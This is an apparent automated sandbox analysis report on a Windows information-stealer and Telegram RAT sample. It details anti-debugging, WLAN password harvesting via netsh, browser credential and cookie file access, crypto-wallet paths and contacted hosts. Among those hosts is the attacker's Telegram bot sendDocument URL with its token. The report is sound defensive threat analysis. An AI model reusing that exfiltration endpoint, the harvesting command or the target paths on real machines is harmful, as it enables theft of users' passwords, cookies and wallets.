Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Code function: 2_2_00007FF886FD5511 CheckRemoteDebuggerPresent,

2_2_00007FF886FD5511

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Queries volume information: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1533359936.000000001BC00000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000002.00000002.1526841628.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1526841628.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: RC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb2
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 2C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /C:\Users\user\AppData\Roaming\Ethereum\keystore2
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: /C:\Users\user\AppData\Roaming\Ethereum\keystore2

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key3.db	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Remote Access Functionality

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000002.00000002.1526841628.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1526841628.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	1 OS Credential Dumping	451 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	161 Virtualization/Sandbox Evasion	Security Account Manager	161 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	44 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	43%	Virustotal		Browse
17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://whatismyipaddressnow.co/API/FETCH/getcountry.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
icanhazip.com	104.16.185.241	true	false	high
57.122.6.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://icanhazip.com/	false	high
https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument	false	high
http://ip-api.com/line/?fields=hosting	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, tmpDCE2.tmp.dat.2.dr	false		high
https://duckduckgo.com/chrome_newtab	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://duckduckgo.com/ac/?q=	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://api.telegram.org	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://api.telegram.org/bot	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://www.office.com/Office	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1533359936.000000001BC00000.00000004.00000020.00020000.00000000.sdmp, tmpDCE2.tmp.dat.2.dr	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	cert9.db.2.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	cert9.db.2.dr	false		high
https://chrome.google.com/webstore?hl=en	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026C2000.00000004.00000800.00020000.00000000.sdmp, tmpB696.tmp.dat.2.dr	false		high
https://www.ecosia.org/newtab/	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpB20C.tmp.dat.2.dr	false		high
https://chrome.google.com/webstore?hl=enWeb	tmpB696.tmp.dat.2.dr	false		high
https://ac.ecosia.org/autocomplete?q=	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://www.oracle.com/technetwork/java/javase/downloads	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1533359936.000000001BC00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/0	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	cert9.db.2.dr	false		high
http://x1.i.lencr.org/0	cert9.db.2.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high
https://whatismyipaddressnow.co/API/FETCH/getcountry.php	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	cert9.db.2.dr	false		high
http://ip-api.com	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.000000000293D000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	tmpB20C.tmp.dat.2.dr	false		high
http://icanhazip.com/X	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	tmpB20C.tmp.dat.2.dr	false		high
http://api.telegram.org	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591658
Start date and time:	2025-01-15 09:08:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/19@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 55% Number of executed functions: 168 Number of non-executed functions: 21
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 20.190.159.4, 20.190.159.73, 20.190.159.75, 40.126.31.71, 20.190.159.68, 20.190.159.64, 40.126.31.69, 20.190.159.71, 4.245.163.56
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:09:18	API Interceptor	23x Sleep call for process: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	q9JZUaS1Gy.doc	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	VRO.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	VRO.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	mP8rzGD7fG.dll	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	iTVsz8WAu4.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	HLi4q5WAh3.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
	e0691gXIKs.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189
